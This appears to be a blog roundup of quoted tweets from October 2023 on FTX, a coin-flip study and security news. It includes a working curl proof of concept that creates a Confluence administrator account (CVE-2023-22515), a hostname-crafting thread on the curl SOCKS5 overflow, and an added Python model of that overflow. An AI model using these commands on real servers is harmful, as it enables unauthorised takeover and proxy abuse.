October 12, 2023
starting to think some of these courtroom sketch artists lost money on FTX pic.twitter.com/36hzJkzaqa
— Molly White (@molly0xFFF) October 11, 2023
here I was hoping for the cURL bug to be something useful to upgrade an SSRF to have new superpowers or something similar. 🙃
— blasty (@bl4sty) October 11, 2023
good luck exploiting this heap overflow on a modern-ish libc in a remote context with valid hostname characters for the trigger
Textbook deception. “In calls, Hamas operatives, who talked to each other when tapped by Israeli intelligence agents, also gave the sense that they sought to avoid another war with Israel so soon after a damaging two-week conflict in May 2021” https://t.co/CsvpkEblQd
— Shashank Joshi (@shashj) October 11, 2023
https://securitylab.amnesty.org/latest/2023/10/technical-deep-dive-into-intellexa-alliance-surveillance-products/
Apparently every business, not just mobile games, is supported by whales.
1/ Just caught up with a few investor friends in the consumer space last week about Ozempic and GLP1s
— Corry Wang (@corry_wang) October 11, 2023
As far as I can tell, everything basically hinges on: how much does it matter that every consumer product in the world depends on a tiny cohort of super consumers?
Imagine going on a date with someone holding a fish in their dating profile picture and when you get to the restaurant it’s just a salmon sitting there waiting
— Missy Martinez (@MissyXMartinez) August 11, 2023
https://curlconverter.com/go/
Guide to setting up a hardware hacking lab for noobs by @wrongbaud https://t.co/IqO6XJYW4A
— Dreg (@therealdreg) October 10, 2023
This is the only good idea I’ve seen so far for the curl bug.
"On finding a too long host name, the curl code makes the bad decision to instead switch over to local resolve mode"
— Juliano Rizzo (@julianor) October 11, 2023
👀 curl with TOR de-anonymization potential (e.g., HTTP redirect to long host name)? https://t.co/W18pYGNkPt
CISA issues warning that people are still using Adobe Acrobat Reader! https://t.co/YWjdML4VkJ
— thaddeus e. grugq thegrugq@infosec.exchange (@thegrugq) October 11, 2023
Fair coins tend to land on the same side they started: Evidence from 350,757 flips
It’s about 51%
[2310.04153] Fair coins tend to land on the same side they started: Evidence from 350,757 flips
Many people have flipped coins but few have stopped to ponder the statistical and physical intricacies of the process. In a preregistered study we collected 350,757 coin flips to test the counterintuitive prediction from a physics model of human coin tossing developed by Diaconis, Holmes, and Montgomery (D-H-M; 2007). The model asserts that when people flip an ordinary coin, it tends to land on the same side it started -- D-H-M estimated the probability of a same-side outcome to be about 51%. Our data lend strong support to this precise prediction: the coins landed on the same side more often than not, $\text{Pr}(\text{same side}) = 0.508$, 95% credible interval (CI) [$0.506$, $0.509$], $\text{BF}_{\text{same-side bias}} = 2364$. Furthermore, the data revealed considerable between-people variation in the degree of this same-side bias. Our data also confirmed the generic prediction that when people flip an ordinary coin -- with the initial side-up randomly determined -- it is equally likely to land heads or tails: $\text{Pr}(\text{heads}) = 0.500$, 95% CI [$0.498$, $0.502$], $\text{BF}_{\text{heads-tails bias}} = 0.183$. Furthermore, this lack of heads-tails bias does not appear to vary across coins. Our data therefore provide strong evidence that when some (but not all) people flip a fair coin, it tends to land on the same side it started. Our data provide compelling statistical support for the D-H-M physics model of coin tossing.
We kinda feared this might be coming https://t.co/g2G9gpKsIX
— Niao Collective (@NiaoCollective) October 11, 2023
Whomst Up Hollabacking They Curls? pic.twitter.com/jam0yl4asx
— @netspooky@haunted.computer (@netspooky) October 11, 2023
PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action
— Nicolas Krassas (@Dinosn) October 11, 2023
(login with adm1n/adm1n)
This is not a standalone PoC for this vuln at all. It won't work unless you first flip the setupComplete bool to false via a request like:
— Erik Wynter (@Wynter@infosec.exchange) (@WynterErik) October 11, 2023
curl -vk "http://<host>:<port>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
Source: https://t.co/FvTITdWFC0
curl CVE-2023-38545 can be used to partially control the SOCKS conversation. Given a hostname of:
— xchg justin,justin (@justinsteven) October 12, 2023
h + PP + padding
Where h is a hostname, PP is a network order short representing a port, and the total length mod 256 is the length of h, this will result in a connection to h:PP
Due to an overflow in the one-byte hostname length field, the client will resolve h and connect to its PP via the proxy. It will send the padding followed by the usual request.
— xchg justin,justin (@justinsteven) October 12, 2023
h, PP and padding must be DNS-safe bytes
This could have SSRF or privacy impact perhaps? ¯\_(ツ)_/¯
Note that the second picture is a listener running on the SOCKS proxy itself, as in this case h == "localhost", which will be taken from the perspective of my SOCKS proxy and for which my proxy allows clients to connect to pic.twitter.com/K5vljZvSbq
— xchg justin,justin (@justinsteven) October 12, 2023
On deanonymisation.
I was wondering that. The SOCKS proxy remains responsible for the resolution and connection, so if the proxy is Tor and it’s well behaved there shouldn’t be an impact? I don’t know enough about Tor deanonymisation though. It’s definitely worth considering.
— xchg justin,justin (@justinsteven) October 12, 2023
https://daniel.haxx.se/blog/2023/10/11/how-i-made-a-heap-overflow-in-curl/
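To make the length-wrapping trick in the thread above concrete, here is an added example that models it in Python. It is not curl's code and not from the thread: `vulnerable_socks5_connect` is a simplified stand-in for a client that writes the hostname length into the single SOCKS5 length byte without checking that it fits, `fixed_socks5_connect` is the obvious hardened variant, and `proxy_parse` shows what a SOCKS5 proxy sees on the wire. `DNS_SAFE` is an assumed byte set standing in for the "DNS-safe bytes" constraint; because the port `PP` also has to pass that filter, only ports whose two big-endian bytes are letters, digits, `-` or `.` can be targeted (the constructed input below uses `b"00"`, i.e. 0x3030 = 12336).

```python
import struct

# Assumed model of the "DNS-safe bytes" constraint from the thread:
# letters, digits, '-' and '.'.
DNS_SAFE = frozenset(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-.")


def build_hostname(h: bytes, port: int, pad_byte: bytes = b"a") -> bytes:
    """Return h + PP + padding with len(result) > 255 and len(result) % 256 == len(h).

    PP is the wanted destination port as a network-order short.  Every byte of
    the result must be DNS-safe, which is what limits the reachable ports.
    """
    pp = struct.pack(">H", port)
    base = h + pp
    bad = [c for c in base + pad_byte if c not in DNS_SAFE]
    if bad:
        raise ValueError(f"non DNS-safe bytes in hostname/port: {bad}")
    total = len(h)
    # Smallest total length that exceeds 255 (the overlong case), holds h and
    # PP, and is congruent to len(h) modulo 256.
    while total <= 255 or total < len(base):
        total += 256
    return base + pad_byte * (total - len(base))


def vulnerable_socks5_connect(hostname: bytes, port: int, payload: bytes) -> bytes:
    """Model of the broken client: SOCKS5 CONNECT, ATYP=3 (domain name), with the
    one-byte length field silently truncated to len(hostname) & 0xFF, followed by
    the real destination port and the data the client sends once "connected".
    Simplified model for illustration, not curl's implementation.
    """
    return (bytes([0x05, 0x01, 0x00, 0x03, len(hostname) & 0xFF])
            + hostname + struct.pack(">H", port) + payload)


def fixed_socks5_connect(hostname: bytes, port: int, payload: bytes) -> bytes:
    """Hardened variant: refuse any name the one-byte length field cannot describe."""
    if len(hostname) > 255:
        raise ValueError("hostname too long for SOCKS5 remote resolve")
    return vulnerable_socks5_connect(hostname, port, payload)


def proxy_parse(request: bytes):
    """What the SOCKS5 proxy sees: (host, port, bytes left over for the tunnel)."""
    ver, cmd, _rsv, atyp = request[:4]
    if (ver, cmd, atyp) != (0x05, 0x01, 0x03):
        raise ValueError("unexpected SOCKS5 request header")
    n = request[4]
    host = request[5:5 + n]
    (port,) = struct.unpack(">H", request[5 + n:7 + n])
    return host, port, request[7 + n:]


if __name__ == "__main__":
    # Constructed input: the client thinks it asked for <265-byte name>:80,
    # the proxy connects to localhost:12336 and forwards the padding as data.
    name = build_hostname(b"localhost", 0x3030)
    req = vulnerable_socks5_connect(name, 80, b"GET / HTTP/1.1\r\n")
    host, port, leftover = proxy_parse(req)
    print(len(name), host, port, leftover[:8])
```

Run the script to see the proxy-side view: the host is `localhost`, the port is 12336 rather than 80, and the 254 padding bytes plus the original port and request trail into the tunnel, matching the thread's description. The hardened builder rejects the same name outright.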
Will be soon releasing a tool that will allow you to play with macOS libmalloc allocators. So you can, um, find strange patterns. pic.twitter.com/E1EMrH1t5e
— Josh Pitts (@ausernamedjosh) October 11, 2023
My presentation video in BlackHat Asia 2023. Hope you like it!😄❤️@BlackHatEvents https://t.co/6MoD7H7Dne
— pyn3rd (@pyn3rd) October 9, 2023
⚗️ nord-stream
— Marco Lancini (@lancinimarco) October 11, 2023
Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab. https://t.co/dNIM9JMqs1
https://www.sfgate.com/bayarea/article/bart-seat-slasher-hurwitz-service-systems-inc-14544785.php
New: European standards body that created secret TETRA encryption algorithms used in police/military radios is talking about making new algorithms public, following intense backlash after researchers found severe security flaws in its old secret algorithms https://t.co/YbgJKuLRS5
— Kim Zetter (@KimZetter) October 11, 2023
Caroline Ellison of FTX admits that Sam bribed Chinese officials with $100M to unfreeze their assets, purposely tried to scam Saudi investors in the final days of FTX, intentionally tried to sic regulators on Binance to destroy his competition, and it's only lunchtime.
— Autism Capital 🧩 (@AutismCapital) October 11, 2023